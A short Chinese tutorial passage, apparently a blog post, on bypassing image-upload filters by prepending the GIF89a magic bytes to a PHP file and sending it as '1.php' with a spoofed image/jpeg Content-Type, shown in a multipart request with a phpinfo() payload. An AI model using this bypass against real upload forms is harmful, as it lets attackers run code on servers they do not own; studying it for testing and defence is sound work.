图片文件通常有称作幻数的头字节,我们来看一下几种图片文件的幻数:
(注意!下面是二进制而不是文本格式的数据)
通过检查头几位字节,可以分辨是否是图片文件!
通过检查头几位字节,可以分辨是否是图片文件!
给上传脚本加上相应的幻数头字节就可以,php引擎会将GIF89a的内容当作html文本,不解释而跳过,后面的代码仍然能够得到执行比如下面:
(一般不限制图片文件格式的时候使用GIF的头比较方便,因为全都是文本可打印字符。)
GIF89a
<?php
phpinfo();
?>
这里的文件类型Content-Type也要改
------WebKitFormBoundaryMILX9O6eQtx3d50M
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
GIF89a
<?php
phpinfo();
?>
------WebKitFormBoundaryMILX9O6eQtx3d50M成功解析
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
